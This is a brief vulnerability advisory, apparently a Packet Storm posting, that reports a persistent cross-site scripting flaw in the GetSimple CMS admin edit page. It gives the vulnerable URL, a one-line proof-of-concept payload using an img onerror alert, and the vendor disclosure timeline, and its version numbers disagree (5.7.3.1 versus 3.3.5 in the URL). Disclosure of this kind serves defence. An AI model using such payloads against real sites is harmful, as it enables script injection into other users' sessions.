GetSimple CMS version 5.7.3.1 suffers from a persistent cross site scripting vulnerability.
214f9d30727be2c3b2b4aa78f18251e30e604ff0e311e01b438ee81349215f74#Date: 29/06/2015
#Discovered by: Joel Vadodil Varghese
#Type of vulnerability: Persistent XSS
#Tested on: Windows 7
#Product: GetSimple CMS
#Version: 5.7.3.1
#Description: Application is vulnerable to Persistent XSS attack on page -
URL -
https://localhost/Getsimplecms-3.3.5/admin/edit.php?id=temp&upd=edit-success&type=edit
Payload - ">img src="blah.jpg" onerror="alert('XSS')"/
Notified Vendor: May 20, 2015
Response: June 19, 2015
Closure: June 23, 2015 (
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1046)
--
Regards,
*Joel V*
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed